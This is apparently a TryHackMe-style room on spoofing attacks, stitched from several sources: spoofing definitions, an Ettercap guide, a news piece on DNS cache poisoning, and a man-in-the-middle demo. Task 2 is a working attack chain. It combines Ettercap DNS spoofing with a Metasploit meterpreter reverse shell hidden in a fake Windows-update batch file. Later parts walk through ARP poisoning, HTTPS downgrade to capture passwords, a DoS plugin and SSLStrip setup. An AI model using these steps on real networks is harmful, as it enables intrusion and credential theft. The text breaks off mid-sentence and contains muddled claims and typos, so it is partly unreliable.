Spoofing attack tryhackme

How to make an Spoofing attack masterfully If you are looking for that then you are in the right place
It is sponsored by Emperor X

Task 1 What is spoofing attack

1. In the context of information security, and especially network security, a spoofing attack is a
situation in which a person or program successfully identifies as another by falsifying data, to gain
an illegitimate advantage
2. Spoofing, as it pertains to cybersecurity, is when someone or something pretends to be something
else in an attempt to gain our confidence, get access to our systems, steal data, steal money, or
spread malware. Spoofing attacks come in many forms, including:
 Email spoofing
 Website and/or URL spoofing
 Caller ID spoofing
 Text message spoofing
 GPS spoofing
 Man-in-the-middle attacks
 Extension spoofing
 IP spoofing
 Facial spoofing

So how do the cybercriminals fool us? Often times, merely invoking the name of a big, trusted
organization is enough to get us to give up information or take some kind of action. For example, a
spoofed email from PayPal or Amazon might inquire about purchases you never made. Concerned about
your account, you might be motivated to click the included link.

From that malicious link, scammers will send you to a web page with a malware download or a faked
login page—complete with a familiar logo and spoofed URL—for the purpose of harvesting your
username and password

There are many more ways a spoofing attack can play out. In all of them, fraudsters rely on victims
falling for the fake. If you never doubt the legitimacy of a website and never suspect an email of being
faked, then you could become a victim of a spoofing attack at some point.

To that end, this page is all about spoofing. We'll educate you on the types of spoofs, how spoofing
works, how to discern legitimate emails and websites from fake ones, and how to avoid becoming a
target for fraudsters

----------------------------------------
1. Note This attack remains vented on the internal network or on the local network and does not
require any intervention from you
2. As it can appear in front of you a window that is the real window. For a real site through which your
credit data is stolen for example. Sometimes the sites are not changed, but the sites are exploited as
they are by spoofing the server
3. Protection from this is very simple, use proxy networks and VPNs because this attack created an
inside attack on the network by spoofing the server is being internal to the network where the spoof
is convincing Your phone or computer is the device that distributes the Internet service What black
hats do is defraud the server that distributes the internal Internet or the local network. The
attacker's device is the device that distributes the Internet service

Answer the questions below Question Hint

How do you protect yourself (By using VPN and ????)

Task 2 ettercap
 First of all, go to Kali Linux Home directory. Move to etc /ettercap directory. Now edit etter.dns
File
 Modify the contents of the etter.dns and add your own pc IP address as A record.

Open terminal Now run the following command with victim pc IP address to spoof the victim pc

ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.103.//

It will activate dns_spoof plug-in.

Open terminal and type msfconsole to open metasploit

 Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

 Now copy this Powershell.exe code and save as update .bat file.

Now create a fake website page showing windows security update message. In webpage, give the
hyperlink as update.bat file.

Now save this webpage as index.html and paste it in directory /var /www/html
 Now start Apache server .write following command. Service Apache2 start.

When the victim will open any web, this page showing windows security update message will
displayed.

When victim will click on download update link & save the batch file. The batch file will execute
automatically.

Now you will get the control of victim PC. Now type the
following command. Now type sessions –l to display sessions
opened when the victim opens the link
Now the session has opened type sysinfo to get system
information, then type shell to enter into Victims command
prompt.
 Answer the questions below
Here you understand how the attack works in a simple way, but there are other ways for the
attack to work, but there is no explanation like this, but there remains a different way to make
this attack by using the ettercap without the command prompt
Task 3 What is Ettercap
Ettercap can be used by hackers to attack a network or by network administrators to defend it.
Find out about this pen-testing tool
Ettercap is a free, open-source tool that can be used for man-in-the-middle attacks on networks.
As such, it can be a threat to network security. However, network administrators need to be
aware of this tool to check the vulnerabilities of their systems.

What is Ettercap?
 It is a packet capture tool that can write packets back onto the network. Thus, data streams can
be diverted and altered on the fly. The system can also be used for protocol analysis to analyze
network traffic and work out which applications generate the most traffic.

There is a GUI interface for Ettercap, and it is also possible to use Ettercap at the command line.
However, the interface is not so hot. Moreover, given the high standard of network monitoring
tools that network administrators are used to nowadays, it is unlikely that you would get Ettercap
to perform network traffic analysis.

The most common uses for Ettercap are man-in-the-middle attacks through ARP poisoning.
Additionally, hackers use this tool, and you can use it for penetration testing.

Ettercap operating system compatibility

Ettercap is primarily a tool for Linux and other Unix-like operating systems. It is available for the
following Linux distros:

Debian
Ubuntu
Kali
BackTrack
Mint
Fedora
Gentoo
Pentoo
OpenSuSe (unsupported)
CentOS (unsupported)
RHEL (unsupported)
The software will also run on Unix:

FreeBSD
OpenBSD
NetBSD
Solaris (unsupported)
Mac operating system versions that the official release notes say will run Ettercap are:

10.6 Snow Leopard

10.7 Lion
The release notes state that the Ettercap can be installed on Windows, but this implementation is
not supported. There is a second version of Ettercap that is available for 32-bit systems running
Windows. The Windows version mentioned by the developers are:

Windows Vista
Windows 7
Windows 8
 Install Ettercap
The installation process is slightly different for each operating system.

Install Ettercap on Kali Linux

If you have Kali Linux, there isn’t anything that you need to do to install Ettercap. It is already
installed.

Install Ettercap on Ubuntu Linux

Go to the command line and enter the two commands:

sudo apt update sudo apt install ettercap-common

Install Ettercap on Debian, BackTrack, and Mint Linux

Open a Terminal session and enter:

sudo apt update sudo apt-get install ettercap-gtk

Install Ettercap on CentOS, Fedora, and RHEL

Issue the commands:

sudo apt update yum install Ettercap

Install Ettercap on Windows Vista, Windows 7, and Windows 8

Go to the Web page
https://sourceforge.net/projects/ettercap/files/unofficial%20binaries/windows/

Click on the top .msi entry listed on the page.

Choose a directory to download the file.

Click on the installer file once it has been downloaded.

What is the best operating system for Ettercap

The latest version of the Windows-compatible package for Ettercap available on SourceForge was

posted in December 2011. Unfortunately, this is very old, and user feedback reports that the
system crashes frequently.

You will see several sites that claim to have a working version of Ettercap for Windows 10.
However, be careful – only download software from well-known sites, such as GitHub or
SourceForge. Hackers set up their download sites to lure in trusting members of the public. The
software you find on these sites is fake and contains malware instead of the promised utilities.
 To summarize, there is no working version of Ettercap, and the version for Windows 7 and
Windows 8 doesn’t work very well. The only serious version of Ettercap is available for Linux. The
system works well on any version of Linux. However, the best distro for using Ettercap is probably
Kali Linux.

Using Ettercap
You can test the resilience of your system settings by running a range of white hat hacker attacks
in a penetration testing exercise with the Ettercap utilities. The episodes you can emulate are:

Man-in-the-middle attacks
DNS spoofing
Credentials capture
DoS attack
Let’s take a look at each of these attacks and how you can implement them with Ettercap.

Man-in-the-middle attacks
In a man-in-the-middle attack, each side in a network conversation thinks they are exchanging
data with each other but communicating with the hacker. For example, a connects to B, but the
hacker intercepts the connection request and responds to A, pretending to be B. Optionally, at the
same time, the hacker might connect to B, pretending to be A. This second connection would be
necessary to extract data from B that will enable the hacker to convince A that it is connected to
B.

The primary motivation for the man-in-the-middle attack is to steal data from A so that the hacker
can later access B in the guise of A. In this case, the hacker doesn’t actively need to interact with
the victim, just watch traffic passing back and forth between the victim and the site on the Web.

A typical goal in this attack scenario would be to steal a user’s login credentials for a valuable
system, such as online banking. The same aim can be satisfied with phishing email scams, which
are technically easier to implement, and so currently, man-in-the-middle attacks are not so
prevalent.

There are two ways to divert traffic through your computer for manipulation, and both can be
implemented with Ettercap. The first of these is ARP poisoning, and the second is a DNS attack.
ARP poisoning is the easiest method of the two and better results for a man-in-the-middle attack
on a local network. The ARP poisoning method lies at the heart of Ettwrcap’s attack methodology.

Adjust the Ettercap configuration for ARP poisoning

First, update the Ettercap configuration file to accrue traffic to the superuser.

sudo vi /etc/Ettercap/etter.conf
Look for the [privs] section in the file. Change the following two lines.

ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default

 Save the file.

Set up the MITM attack

Make a note of your network’s router. Type the following command:

ip r
The results will state default via and then an IP address. This is the address of the router. Write it
down.

Start up Ettercap with its front-end graphical interface. With the command:

sudo -E Ettercap -G
In this attack strategy, we will get the victim’s computer to believe our computer is the router.
The sending computer already knows the IP address of the router. We won’t change that. Instead,
we will link the MAC address of our computer to that IP address.

Click on Sniff in the top menu and then select Unified Sniffing from the drop-down menu. You will
see an Ettercap Input dialog box. Select the network interface that is on the same network as the
target computer and press OK.

Click on the Hosts option on the top menu and select Scan for hosts from the drop-down menu.
Next, click on the Hosts option again and choose Hosts List. This will show you the other devices
connected to the network. First, you need to work out which of these is your target computer.

The Hosts List shows the IP addresses of all computers connected to the network. Click on the line
for the target and click on the Add to Target 1 button. Next, click on the address of the network’s
router and press the Add to Target 2 button. You can add as many Target 1 addresses as you like.
For every Target 1 address, you insert in this setup, the computer associates with that IP address
 will have its traffic diverted through the computer running the Ettercap system. All other
computers will communicate with the router in the usual manner.

Click on the MITM option on the top menu and then on ARP poisoning. In the dialog box that
appears, select Sniff remote connections and then click on OK. Next, click on the Start option in
the top menu and then choose Start Sniffing. This remaps the IP address of the router to your
computer. The Ettercap system will forward the traffic to the actual router and channel responses
back to the target.

Run the MITM attack

Now you will receive all of the traffic from that target machine going to the router. Any HTTPS
connections will be downshifted to unprotected HTTP communication.

In the Ettercap interface, click on the View option on the top menu and select Connections from
the drop-down menu. Next, click on a line in the connection list shown in the central panel of the
interface to open a split board. This will show you the packet header data for the connection. If
the payload isn’t encrypted, you should read the contents of the packet body.

DNS spoofing
To hijack traffic between a target and an external website to perform a man-in-the-middle attack,
you can use DNS spoofing. The domain name system cross-references Web domain names with
the actual IP addresses of the servers that host the pages for that site. Therefore, updating a local
DNS server to give your IP address for a domain will enable you to capture traffic to and from that
site.

The DNS spoofing option allows you to read and pass through all traffic or intercept it completely,
delivering your version of the desired website to the victim.

Adjust the Ettercap configuration for DNS spoofing

You need to alter the configuration file of your Ettercap instance to perform DNS spoofing. DNS
spoofing doesn’t replace the ARP poisoning technique explained in the previous section. You need
the ARP poisoning system to be active through Ettercap for the DNS spoofing service to work.

Edit the etter.dns file with Vi:

sudo vi /etc/Ettercap/etter.dns

This file will be the local DNS database referred to by your target computer. This is the closest DNS
server to the victim, so any sites that aren’t mentioned in your local record will be referenced
through the next closest, which the victim’s DNS server will specify.

Enter a record for the website that you want to capture connections for. This should be in the
format <domain name> A <server IP address>. For example, if you want all traffic from the
 victim’s computer to compatritech.com to be delivered to your computer on the network and
your local address is 127.0.0.3, the record you write in would be:

comparitech.com A 127.0.0.3

You can make as many entries as you like, and it is possible to point many different sites to the
same address.

Save the altered etter.dns file.

Run the DNS spoofing attack

When running these tests, you have the advantage of being inside the local network. A hacker
could use this tool to divert requests to any location on earth – the new server address doesn’t
have to be on the local network. However, with Ettercap, the interception provided by the ARP
poisoning has to be operating on the local network for this attack to work.

Go to the Ettercap interface. Remember, it should already be running ARP poisoning for one or
several victims on the network.

Click on Plugins in the top menu and then select Manage the plugins from the drop-down menu.
This will open a new tab in the interface and list all available plugins. Scan the list and find
dns_spoof. Double-click on this line to activate the service. This means that you etter.dns
becomes the local DNS server for the victim computers you have in your Target 1 hosts list.

Credentials capture
You can read the contents of passing packets in the Ettercap interface once ARP poisoning is
active. However, if the target computer uses HTTPS to communicate with websites, all of the
traffic will have the contents of the packet payload encrypted. The encryption key will be
negotiated between the two ends of the connection when contact is established. The easiest way
to break this protection is to remove the need for HTTPS. This stops the victim’s computer from
using HTTPS and forces it just to use HTTP to communicate with websites, thus leaving the
payload unencrypted and readable.

Go back to the etter.conf file and edit it:

sudo vi /etc/Ettercap/etter.conf

Skip to the section that says # if you use iptables and remove the comment hash from the front of
the two redir lines. These downgrade SSL connections to unprotected HTTP. Save the file.

Now, when you go back to the Ettercap interface and View > Connections, you will be able to read
the packet contents and find the usernames and passwords passed within the HTML protocol
message format.
 DoS attack
You can completely block all web access for specific endpoints on your network through Ettercap.
To do this, you need to have the ARP poisoning attack, described above, operating. After that, the
block will work for all of the endpoints added to your Target 1 list.

Once the ARP poisoning is running, click on Plugins in the top menu and select Manage the plugins
from the drop-down list. This will show a list of available services. Scan down the list to find a line
for dos_attack. This is usually the following line after the dns_spoof entry. Double click on the
dos_attack line to activate the attack.

Defending against Ettercap

This guide has shown you a few easy tests to see how hackers can mess up the communications
on your network using Ettercap. Although Ettercap is known as a hacker tool, it has one weakness:
it needs to be running on a computer within a network to be effective.

In this guide, we looked at how to use Ettercap through its graphical user interface. However,
there is also a command-line version, and this could be set up without any visible indicators on
the targeted computer. A hacker could write scripts to install Ettercap and set an ARP poisoning
session running without the user seeing this background operation.

One way to defend against the use of Ettercap by hackers to damage your network security is to
scan every endpoint for the Ettercap process. This can easily be performed by any endpoint
detection and response (EDR) service, which will probably already be primed to spot and kill
Ettercap.

The most likely way that a hacker would get Ettercap running on one of your network’s endpoints
is to masquerade an installer program, which is also known as a “dropper”, as a PDF or a zip file
attached to an email. This would then activate once the conned user opened it. Thus, it is
essential to educate users against opening attachments on emails.

Ettercap FAQs
What is Ettercap used for?
Ettercap is a security analysis tool that emulates a “man in the middle” attack to detect system
vulnerabilities. The service deploys techniques such as ARP poisoning and password decryption to
capture traffic and insert fake responses into the stream. It can also be used for DoS attacks.

Is Ettercap a sniffer?
Ettercap was originally designed to be a packet sniffer and that function is still at the heart of the
tool. Think of Ettercap as a packet sniffer with added functions. Those extra functions are now
considered to be the main reason to use Ettercdap – for network attacks or penetration testing.

What is ARP spoofing vs ARP poisoning?

ARP Spoofing and ARP Poisoning are used to mean the same thing, which is altering address
resolution protocol records. “Spoofing” means impersonating, so ARP spoofing means
 representing a computer with the IP address that was originally assigned to another computer’s
MAC address. In the interest of thoroughness, this should also include altering the relevant ARP
record. “Poisoning” means corrupting the ARP table. It is possible to implement spoofing without
poisoning. However, this relies on the tricked computer not checking ARP tables, so it is better to
implement poisoning as well
Answer the questions below
Question Hint
The most common uses for Ettercap are man-in-the-middle attacks ????????????
( are man-in-the-middle attacks through ARP poisoning Additionally hackers use this tool and you
can use it for penetration testing )
Task 4 This cabinet was attack in 2008
This cabinet was attack in 2008

DNS cache poisoning, the Internet attack from 2008, is back from the dead
A newly found side channel in a widely used protocol lets attackers spoof domains

In 2008, researcher Dan Kaminsky revealed one of the more severe Internet security threats ever:
a weakness in the domain name system that made it possible for attackers to send users en masse
to imposter sites instead of the real ones belonging to Google, Bank of America, or anyone else.
With industrywide coordination, thousands of DNS providers around the world installed a fix that
averted this doomsday scenario.
Now, Kaminsky’s DNS cache poisoning attack is back. Researchers on Wednesday presented a new
technique that can once again cause DNS resolvers to return maliciously spoofed IP addresses
instead of the site that rightfully corresponds to a domain name.
 “This is a pretty big advancement that is similar to Kaminsky’s attack for some resolvers,
depending on how [they’re] actually run,” said Nick Sullivan, head of research at Cloudflare, a
content-delivery network that operates the 1.1.1.1 DNS service. “This is amongst the most
effective DNS cache poisoning attacks we’ve seen since Kaminsky’s attack. It’s something that, if
you do run a DNS resolver, you should take seriously.”
DNS primer
When people send emails, browse a website, or do just about anything else on the Internet, their
devices need a way to translate a domain name into the numerical IP address servers used to
locate other servers. The first place a device will look is a DNS resolver, which is a server or group
of servers that typically belong to the ISP, corporation, or large organization the user is connected
to
In the event another user of the ISP or organization has recently interacted with the same domain,
the resolver will already have the corresponding IP address cached and will return the result. If
not, the resolver will query the dedicated authoritative server for that particular domain. The
authoritative server will then return a response, which the resolver will provide to the user and
temporarily store in its cache for any other users who may need it in the near future
The entire process is unauthenticated, meaning the authoritative server uses no passwords or
other credentials to prove it is, in fact, authoritative. DNS lookups also occur using UDP packets,
which are sent in only one direction. The result is that UDP packets are usually trivial to spoof,
meaning someone can make UDP traffic appear to come from somewhere other than where it
really originated
DNS cache poisoning: A recap
When Internet architects first devised the DNS, they recognized it was possible for someone to
impersonate an authoritative server and use the DNS to return malicious results to resolvers. To
protect against this possibility, the architects designed lookup transaction numbers. Resolvers
attached these 16-bit numbers to each request sent to an authoritative server. The resolver would
only accept a response if it contained the same ID
What Kaminsky realized was that there were only 65,536 possible transaction IDs. An attacker
could exploit this limitation by flooding a DNS resolver with a malicious IP for a domain with slight
variations—for instance, 1.google.com, 2.google.com, and so on—and by including a different
transaction ID for each response. Eventually, an attacker would reproduce the correct number,
and the malicious IP would get fed to all users who relied on the resolver. The attack was called
DNS cache poisoning because it tainted the resolver's store of lookups
The DNS ecosystem fixed the problem by exponentially increasing the amount of entropy required
for a response to be accepted. Whereas before, lookups and responses traveled only over port 53,
the new system randomized the port-number lookup requests used. For a DNS resolver to accept
the IP address, the response also had to include that same port number. Combined with a
transaction number, the entropy was measured in the billions, making it mathematically
infeasible for attackers to land on the correct combination
Cache poisoning redux
On Wednesday, researchers from Tsinghua University and the University of California, Riverside
presented a technique that, once again, makes cache poisoning feasible. Their method exploits a
side channel that identifies the port number used in a lookup request. Once the attackers know
the number, they once again stand a high chance of successfully guessing the transaction ID
 The side channel in this case is the rate limit for ICMP, the abbreviation for the Internet Control
Message Protocol. To conserve bandwidth and computing resources, servers will respond to only
a set number of requests from other servers. After that, servers will provide no response at all.
Until recently, Linux always set this limit to 1,000 per second.

To exploit this side channel, the new spoofing technique floods a DNS resolver with a high number
of responses that are spoofed so they appear to come from the name server of the domain they
want to impersonate. Each response is sent over a different port
When an attacker sends a response over the wrong

Answer the questions below

In 2008 Who discovered this threat?

Dan Kaminsky

What Kaminsky realized

was that there were only 65,536 possible transaction IDs

How do we know

Because the resolver can send only a fixed number of such ICMP messages in one
second, which means the attacker can also try to solicit such ICMP packets to itself

Task 5 ettercap spoofing MiTM attack explained

One of my favorite parts of the security awareness demonstration I give for companies, is the
man-in-the-middle (MiTM) attack. In this, I explain the factors that make it possible for me to
become a man-in-the-middle, what the attack looks like from the attacker and victim's
perspective and what can be done to prevent this.
------------------------------------------------------------------------------------------------------------
During this attack I'm able to see a victim's network traffic and browsing behavior.
Weaponizing this possibility I then steal the victim's cookies, take over his web session and
change his profile picture on the website he's visiting to demonstrate the privileges I gained.
The reason I like this demonstration so much, is that it really helps convey the importance of
security awareness on the audience's personal level. Moreover, the MiTM attack is a great
container for introducing several interesting techniques, concepts and tools and executing
the attack brings these all together.

This is why I decided to put this knowledge in the article you are reading now.

Contents
During a man-in-the-middle attack an attacker places himself between two otherwise inter-
connected devices. By doing this, the network traffic of both devices flows through the
attacker's machine, allowing him to intercept, read and modify the contents.

Since we're exploiting the ARP protocol to achieve this, the first chapter describes how this
protocol works. Then we'll dive into the scenario and theory of this exploit, followed by a
practical breakdown of the entire attack from both the attacker and the victim's perspective.
The last chapter describes how this attack can be prevented on a network level, in the
website configuration and what you can do as a client to avoid becoming a victim of this
attack. Shortcuts to the chapters are included below for quick reference:
---------------------------
The ARP protocol
The way the ARP protocol works, is the reason it is open for an MiTM attack. So, in order to
understand the attack, a basic understanding of this protocol is required.

ARP stands for Address Resolution Protocol, which helps a network host make a translation
from the IP-address to the MAC-address. This is required in order for data to pass from the
OSI model's Network Layer (layer 3) to the Data Link layer (layer 2) and vice-versa.

Suppose Machine A needs to transfer data to Machine B. Zooming in to the lower levels of
the OSI model, it would need to pass through the Network layer, the Data Link layer and the
Physical layer (layer 1). For Machine A to be able to address Machine B, Machine A would
need to know the IP address of Machine B; information that is known in the Network layer.
The Data Link layer communicates using MAC addresses. So, a conversion needs to take place
from the IP address to the MAC address of Machine B (and vice-versa on the recipient
machine). This is illustrated in the image below:

OSI Model layers 1-3

The conversion from, or rather resolution of, the IP address into MAC address (and the other
way around) is where the ARP protocol comes into play. Both machines will have an ARP
table where the IP- and corresponding MAC-addresses of all known machines are stored.
Then how does Machine A get the MAC-address corresponding to the IP Address of Machine
B?

Machine A will just ask for it.

A simplification of the ARP protocol is depicted in the animation below:

 ARP protocol

Let's briefly go over the 3 steps in the animation:

In the first step of the ARP protocol, Machine A sends

out an ARP request. This is a broadcast to the network
with the question "Who has the MAC-address for the IP-
address of Machine B?".

The machine that has this knowledge (usually Machine B

itself), will send an ARP reponse stating "MAC-address B
is the MAC-address of Machine B".

Machine A receives the ARP response and writes (or

updates) the entry in his ARP table.

The last step is exactly where the problem with this

protocol lies. However, before we dive into its issues,
we'll take a look at the ARP packets being transmitted
over the network.

ARP Network traffic

The image below displays a part of a network capture made

with Wireshark.
 ARP network capture

We can clearly see two packets with numbers 7 and 8

respectively.

Packet 7 contains the ARP request from a machine with MAC

address ending with 56:e7 (source). Its destination has MAC
address ff:ff:ff:ff:ff:ff, which indicates it does not have a
specific destination; it's a broadcasted message. The packet is
summarized by Wireshark as "Who has 192.168.1.2? Tell
192.168.1.130".

Packet 8 is the ARP response from a machine with MAC address

ending with 01:e7. The destination had the MAC address of the
originator (source) of packet 7. Wireshark summarizes its info
as "192.168.1.2 is at 00:50:56:ea:01:e7", which is actually the
same MAC-address of the source of this message. This means it
was the machine itself responding to the request. Note that this
ARP response is aimed directly at the originator (source) of the
ARP request (MAC-address 56:e7).

The lower section of the image shows the details of packet 7.

Here we can clearly see the sender is on IP-address
192.168.1.130 and that machine is looking for the MAC-address of
192.168.1.2.

Now let's check out the issue with this protocol.

 ARP Spoofing

The fact that Machine A updates its ARP table with the info from
an ARP response without any question about the validity of this
information, opens the door for ARP spoofing (also known as ARP
poisoning).

An attacker might send a malicious ARP response, without any

preceding request, containing his own MAC address and the IP
address of another machine. The machine to which the response
was directed will update its ARP table unquestioningly.

ARP spoofing

The image above depicts the same scenario as before. However, a

hacker has now joined Machine A and B on the network. The hacker
has done his work in the reconnaissance and scanning phases,
knows Machine A and B exist in the network and what IP addresses
they have.

In this example, the hacker himself has IP-address H and MAC-

address mac-H. He sends his malicious ARP response directed at
Machine A with the message "mac-H is the MAC-address of IP-
address B". Machine A updates its ARP table and IP-address B is
now linked to MAC-address H.
 From now on, every time Machine A wants to send a message to
Machine B, it will translate the IP address of Machine B into
MAC-address H and be sent to the hacker instead of Machine B.

Man-in-the-middle

We've seen how an attacker can make a machine send its data to
him instead of the intended destination by sending a
malicious ARP response. Now let's see how this technique can be
weaponized to become a man in the middle of two machines.

Consider the following scenario:

ARP spoofing scenario

In this scenario we see 3 actors: A Gateway, Adam and a Hacker.

At first we see Adam connected to the Internet via a Gateway. In

this step, the hacker will be doing reconnaissance and scanning
on the network to find out who else is present and what their
IP- and MAC-addresses are.
 The hacker then sends a malicious ARP response to both the
Gateway and Adam. Basically, the hacker tells the Gateway that
he is Adam and simultaneously tells Adam that he is the Gateway.

Both Gateway and Adam will update their ARP tables with their
new information. From then on, these nodes will start to send
their data to the hacker instead of each other. ARP spoof
completed!

The hacker will need to take some measures before he can

properly start intercepting data, but we'll discuss those in a
moment.

HTTPS to the rescue ... ?

Consider the scenario of the previous chapter where the hacker

is in between the Gateway and Adam. The hacker would be able to
see all traffic of both parties. For example, if Adam browses to
a website, the hacker may see all data sent to and received from
the websites he's contacting.

What about HTTPS? That's HTTP over TLS (or HTTP over SSL). It
would mean that all data over the line would be encrypted right?
True, and real-time decryption still is not even remotely
feasible. So, the hacker would not be able to see the encrypted
contents of HTTPS-traffic.

The solution: force the victim to communicate via HTTP, which is

unencrypted plain text, instead of HTTPS.

Before I explain how this can be done, let's take a look at how
an HTTPS-session is setup when you browse to www.google.com (for
example):
 Answer the questions below

Wireshark summarizes its info as

"192.168.1.2 is at 00:50:56:ea:01:e7"

The lower section of the image shows the details of packet 7

Here we can clearly see the sender is on IP-address

192.168.1.130

For example, if Adam browses to

a website, the hacker may see all data sent to and received from
the websites he's contacting

Task 6 HTTPS session setup

HTTPS session setup

Typing www.google.com in a web browser's address bar will have
the browser make an HTTP-connection (on port 80) to
www.google.com. Since google.com will only allow HTTPS-
connections, the site will request the user to make an HTTPS-
connection instead. The client will then reconnect using HTTPS
on port 443. This succeeds and google.com returns its
certificate.

Forcing HTTP communication

Consider the scenario where a hacker is somewhere in between the
communication of web server and the client. The hacker would be
able to read the contents of the web traffic until the moment
the client sets up the HTTPS-connection. After this all data
will be encrypted and no longer readable by the hacker. Earlier
we stated that this might be circumvented by forcing the client
to keep communicating via HTTP. SSLStrip is the tool we will use
to achieve this.

SSLStrip, created by Moxie Marlinspike, will transparently

hijack HTTP traffic on a network, watch for HTTPS links and
redirects, then map those links into either look-alike HTTP
links or homograph-similar HTTPS links. Let's take a look at the
HTTPS session setup when the hacker uses SSLStrip in between the
client and the web server.

SSLStrip
Like before, the client types www.google.com in the webbrowser,
which will attempt to setup an HTTP connection with the website.
Now with SSLStrip in the middle, this connection is forwarded to
the intended destination. However, instead of the entire HTTPS-
redirect-dance to be performed on the client's side, SSLStrip
takes care of this on the hacker's machine. After the HTTPS-
connection was setup, SSLStrip will return an HTTP-OK to the
client. The client's browser thinks this is acceptable since it
never saw the HTTPS-redirect and will continue to communicate
via HTTP; a format the hacker can read effortlessly.

HTTP strict transport Security

 Having HTTP strict transport security (HSTS) enabled for your
website will inform the browser to always communicate using
HTTPS. It does this via a special HSTS response header. Simply
put, the browser maintains a list of websites from which it
received this header. For these websites, the browser will
immediately make an HTTPS-connection regardless of how the user
attempted to connect. Typing www.google.com will not result in
the HTTP-HTTPS-redirect-dance, but immediately call
https://www.google.com. This will prevent users from making the
HTTP-connection in the first place, avoiding SSLStrip to perform
this trick. That is, if your browser supports it.

The first ever visit of a client to a website may still be done

via HTTP and an attacker can strip the HSTS header from the
response. This is why most modern browsers have a pre-loaded
list of HSTS sites. More on prevention in the final chapter.

The attack in practice

In this chapter I will demonstrate what a man-in-the-middle
attack looks like from both hacker and victim's perspectives.
Let it be clear that using this technique on networks / setups
for which you don't have explicit permission, may land you in
loads of trouble. This explanation is for educational purposes
only.

Setup
My lab is setup as follows:
 Lab setup
These are the configurations of the 3 components in this setup:

The attacker will be running Kali Linux with IP-address

192.168.1.134
The victim is running Windows 7 on a machine with IP-address
192.168.1.130
Both machines are connected via a gateway with IP-address
192.168.1.2

Attack setup
From the attacker's perspective, when we just joined the
network, we don't know anything about the network or the nodes
that are connected to it. Let's do some reconnaissance first.

Reconnaissance
We first want to know the details of our own network interface
via the ifconfig command:
 ifconfig
Here we see that our own IP-address is 192.168.1.134 and our
MAC-address is 00:0c:29:a0:08:88.

Then we should find out the IP-address of the gateway by running

the route -n command:

route -n
We can see the gateway's IP-address is 192.168.1.2. Now we'll
attempt to discover who's on the network in our 192.168.1.xxx
subnet, by running the command netdiscover -r 192.168.1.0/24.
This will attempt to discover all nodes in the range 192.168.1.0
to 192.168.1.255:

netdiscover -r 192.168.1.0/24
Besides the gateway, we found another node: the victim on
192.168.1.130. Notice the line above the table in the figure
above. It states that it captured 4 ARP requests/responses.
Netdiscover sniffs the ARP traffic to discover who's on the
network. With the parameters we supplied, netdiscover actively
requested around for node information, quite a loud operation.
If we would have provided the -p-parameter, it would have
passively listened to the ARP-traffic; a bit stealthier.
 SSLStrip setup
Now we know the IP-addresses of the machines we want to be in
between of, we are almost ready to perform the ARP-poisoning.
Before we do that however, there are a few things we need to do
to setup SSLStrip in preparation of the attack.

IPv4 forwarding
Make sure all IPv4 traffic is forwarded. If we wouldn't do this,
all IPv4 traffic would stop at our hacker machine in the middle
of both nodes. This would result in a Denial-of-Service attack
to our victim, who would no longer able to communicate to the
Gateway.

In Linux, we enable IPv4 forwarding by executing the following

command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirecting HTTP to SSLStrip
We also need to make sure all HTTP-traffic is redirected to
SSLStrip. When running, SSLStrip listens on port 10000 by
default. Redirecting incoming HTTP-traffic (TCP on port 80) to
port 10000 on our own machine, requires a modification in the
linux firewall tables via the iptables command:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 10000
Running SSLStrip
Since sslstrip is included in Kali Linux, running this program
is as easy as executing the command sslstrip.

SSLStrip preparation and execution

Attack with Ettercap

Now SSLStrip is running and all preparations are in place, we
can start the attack. In order to send the malicious ARP-
reponses we could craft our own packets with scapy or use Cain &
Abel. Very useful tools and worth articles on their own.
However, for this purpose I'll be using Ettercap, a powerful
man-in-the-middle toolset that comes pre-installed with
Kali Linux.

After fireing up Ettercap's GUI with the command ettercap -G, in

the menu choose Sniff - Unified sniffing...:
A popup will show where we can choose which network interface to
use. I chose the default eth0:

In the extended menu, choose Hosts - Hosts list. This will

display a list of known hosts on the network. If no hosts are
shown, you can scan for hosts via the menu Hosts - Scan for
hosts.
As we can see, both the gateway and the victim are present. In
the hostlist, select the gateway (192.168.1.2) and press the
button Add to Target 1. We do the same for the victim
(192.168.1.130) and press Add to Target 2. This way, we may add
multiple addresses to either Target groups, enabling us to be
man-in-the-middle of many different machines at the same time.
After having set the targets, in the menu choose MiTM
- ARP poisoning..., which will display the following popup:

Choose Sniff remote connections and press OK. The other

option would allow us to only send the
malicious ARP response to one of the targets, leaving the
other one unmodified.
 Now both sides are poisoned via ARP spoofing, Ettercap
will summarize the details of the affected target groups
in its log:

ARP responses - Network traffic

When taking a look at a part of the network traffic
captured during the ARP poisoning, we see that the ARP
requests were sent out to the gateway and the victim:

Both messages are sent form our hacker machine

(MAC 00:0c:29:a0:08:88). Checking out the details of the first
message, we see its target is the gateway (IP-address
192.168.1.2). Wireshark detected a potential problem with this
 message and notes that the hacker's MAC-address has been seen
linked to another machine's IP address as well.

Victim's side
Let's switch to the victim's side of this attack and what it
looks like from his perspective.

ARP table
We'll start out by checking the victim's ARP table via the arp -
a command in Windows. Before the poisoning, the victim's ARP-
table looked like this:

We see that the gateway and victim's IP addresses have different

MAC-addresses (called physical address in the table). After
the ARP poisoning, both IP-addresses should refer to our (the
hacker's) MAC-address 00:0c:29:a0:08:88. Indeed, we can see this
is exactly what happened if we run the arp -a command after the
ARP poisoning:

Just browsing
As a victim, we open Internet Explorer and browse to
www.gmail.com. I was in Spain when I performed this hack, so
this is what the Spanish Gmail front-page looks like:
As a victim of this attack, we may notice a few things wrong
with the front-page:

The address in the address-bar shows HTTP instead of HTTPS,

while we know Gmail would usually be served over HTTPS.
 More important, we see no indication we're using a secure
connection, like a lock-symbol, 'Secure' text, or the name of a
company.
Note that this is an older version of Internet Explorer without
HSTS for the purpose of this demonstration. Just for comparison,
this is what a 'safe' address bar would look like in this
version of Internet Explorer:

Notice the HTTPS and presence of a lock-symbol on the right side

of the address. Most modern browsers will have better
notifications for secure connections. The most recent versions
of Firefox and Chrome (version 62+) actively notify the user of
insecure connections. It's great to see the browser companies
are shifting to security-by-default, in which you're not
notified when something is secure, but rather when things are
not secure. Troy Hunt has written a great blog post about this.

